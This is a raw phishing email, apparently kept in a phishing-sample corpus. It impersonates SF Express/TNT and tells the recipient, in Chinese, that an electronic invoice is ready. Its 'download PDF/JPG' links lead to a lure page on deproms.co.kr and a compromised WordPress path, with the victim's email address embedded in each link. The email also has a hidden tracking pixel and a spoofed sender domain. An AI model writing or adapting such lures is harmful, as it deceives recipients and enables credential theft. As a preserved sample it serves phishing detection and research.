From: "TNT | SfExpress" <gaia@excellentsistemas.com.br>
To: jose@monkey.org
Subject: =?UTF-8?B?VE5UIHwgU2ZFeHByZXNzIOmhuuS4sOeUteWtkOWPkeelqOmAmuefpSBUZW1wby8wMDE=?=
Date: 13 Mar 2019 22:35:00 -0700
Message-ID: <20190313223459.7992C00A77D89874@excellentsistemas.com.br>
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 61

<br><div class=3D"gmail_quote"><div dir=3D"ltr"><div class=3D"gmail_quote">=
<div><div id=3D"m_-1688183537512443673m_3867587514984553029m_-7805823033955=
645185m_-1613234380254737065m_8921462594819464755m_-8028234578460808480ydp7=
729422yahoo_quoted_2254599639" class=3D"m_-1688183537512443673m_38675875149=
84553029m_-7805823033955645185m_-1613234380254737065m_8921462594819464755m_=
-8028234578460808480ydp7729422yahoo_quoted"><div style=3D"font-family:'Helv=
etica Neue',Helvetica,Arial,sans-serif;font-size:13px;color:#26282a">
                <div><div id=3D"m_-1688183537512443673m_3867587514984553029=
m_-7805823033955645185m_-1613234380254737065m_8921462594819464755m_-8028234=
578460808480ydp7729422yiv4575562715"><div><div>&#23562;&#25964;&#30340;&#39=
034;&#20016;&#36895;&#36816;&#23458;&#25143;&#65306;&nbsp;</div>
<div>&#24744;&#22909; <a rel=3D"nofollow" href=3D"mailto:jose@monkey.org" t=
arget=3D"_blank"><span style=3D"TEXT-DECORATION:underline">jose@monkey.org<=
/span></a></div>
<div>&nbsp;</div>
<div>&#24863;&#35874;&#24744;&#36873;&#25321;&#39034;&#20016;&#36895;&#3681=
6;&#20026;&#24744;&#25552;&#20379;&#30340;&#25910;&#27966;&#26381;&#21153;&=
#12290; &#24744;&#30003;&#35831;&#30340;&#30005;&#23376;&#21457;&#31080;&#2=
4050;&#25104;&#21151;&#24320;&#20855;&#65281;&#21457;&#31080;&#35814;&#2477=
3;&#22914;&#19979;&#65306;&nbsp;</div>
<div>&#21457;&#31080;&#20195;&#30721;&#65306;0445317996709 <br></div>
<div>&#21457;&#31080;&#21495;&#30721;&#65306;638492947</div>
<div>&#21457;&#31080;&#37329;&#39069;&#65306;009.220&#20803;&nbsp;</div>
<div>&#21253;&#21547;&#30340;&#36816;&#21333;&#21495;&#65306;</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>&#24744;&#21487;&#20197;&#28857;&#20987;&#20197;&#19979;&#38142;&#2550=
9;&#19979;&#36733;&#30005;&#23376;&#21457;&#31080;&#12290;</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>1&#12289;<a href=3D"http://deproms.co.kr/sfexp/SFExpress/index.php?ema=
il=3Djose@monkey.org" rel=3D"nofollow" target=3D"_blank" data-saferedirectu=
rl=3D"https://www.google.com/url?q=3Dhttp://grapplingtechs.com/wp-content/p=
lugins/akismet/.cache/main/SFExpress/index.php?email%3D%250%25&amp;source=
=3Dgmail&amp;ust=3D1552608933779000&amp;usg=3DAFQjCNFlyNpua9wztTof4laPr5bmS=
Q4Bmw"><span style=3D"TEXT-DECORATION:underline">&#19979;&#36733;PDF</span>=
</a>&#26684;&#24335;&#30005;&#23376;&#21457;&#31080;&nbsp;</div>
<div>2&#12289;<a href=3D"http://deproms.co.kr/sfexp/SFExpress/index.php?ema=
il=3Djose@monkey.org" rel=3D"nofollow" target=3D"_blank" data-saferedirectu=
rl=3D"https://www.google.com/url?q=3Dhttp://grapplingtechs.com/wp-content/p=
lugins/akismet/.cache/main/SFExpress/index.php?email%3D%250%25&amp;source=
=3Dgmail&amp;ust=3D1552608933779000&amp;usg=3DAFQjCNFlyNpua9wztTof4laPr5bmS=
Q4Bmw"><span style=3D"TEXT-DECORATION:underline">&#19979;&#36733;JP</span><=
/a>&#26684;&#24335;&#30005;&#23376;&#21457;&#31080;&nbsp;</div>
<div>&#31995;&#32479;&#37038;&#31665;&#65292;&#35831;&#21247;&#22238;&#2279=
7;&#12290;&#22914;&#26377;&#38656;&#27714;&#65292;&#35831;&#32852;&#31995;&=
#25910;&#27966;&#21592;&#25110;&#23458;&#26381;&#65292;&#35874;&#35874;&#65=
281;</div></div></div></div>
            </div>
        </div></div></div><div><img id=3D"m_-1688183537512443673m_386758751=
4984553029m_-7805823033955645185m_-1613234380254737065m_8921462594819464755=
sl_img_tracker" class=3D"m_-1688183537512443673m_3867587514984553029m_-7805=
823033955645185m_-1613234380254737065m_8921462594819464755ad-img-tracker" s=
rc=3D"https://ci4.googleusercontent.com/proxy/4FqUe3t5WUDy3bFQfk81yNaE4Gih-=
LNZpJpjxyVLREv9lgKIiFbXldUV0u8Z0Q0lFPXnIlABIMtc_vfvI-gtfKKyb_9g522rH4LVb0Iz=
vHFPpw=3Ds0-d-e1-ft#https://app.adapt.io/mt/track/B23346CF91B7B7A2C08F15513=
84176632" style=3D"display:none;width:1px;height:1px"></div></div>
</div>

From jose@monkey.org Fri Mar 15 10:58:18 2019 +0000
Return-Path: gaia@excellentsistemas.com.br
Delivered-To: jose@monkey.org
X-FDA: 75269156676.25.lock58_487e753e21117
X-Spam-Summary: 60,1,0,16fb248d92b9448a,d41d8cd98f00b204,gaia@excellentsistemas.com.br,:,RULES_HIT:41:46:72:150:153:355:375:379:495:800:967:973:982:983:988:989:1133:1208:1224:1260:1263:1311:1313:1314:1345:1381:1431:1432:1513:1515:1516:1517:1521:1533:1534:1543:1565:1593:1594:1699:1711:1714:1719:1730:1747:1777:1792:2194:2199:2393:2525:2527:2557:2561:2565:2610:2682:2685:2828:2859:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3769:3876:3877:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4605:5007:6114:6261:6300:6642:6671:6672:8599:8603:8957:8987:9025:9388:10004:10049:10346:10400:11026:11537:11638:11639:11658:11914:11984:12043:12073:12075:12438:12522:12555:12764:12903:12956:12986:13007:13008:13025:13139:13439:13975:14093:14096:14181:14655:14721:14849:18000:21080:21347:21433:21436:21451:21483:21524:21627:21819,0,RBL:177.39.53.182-irl.urbl.hostedemail.com-127.0.0.150,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSB
X-HE-Tag: lock58_487e753e21117
X-Filterd-Recvd-Size: 4797
Received: from mail.excellentsistemas.com.br (mail.excellentsistemas.com.br [177.39.53.182])
	by imf13.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri, 15 Mar 2019 10:58:17 +0000 (UTC)
Received: (qmail 9187 invoked by uid 500); 14 Mar 2019 19:28:14 -0000
Received: from unknown (HELO excellentsistemas.com.br) (gaia@excellentsistemas.com.br@23.227.207.215)
  by mail with ESMTPA; 14 Mar 2019 19:28:13 -0000
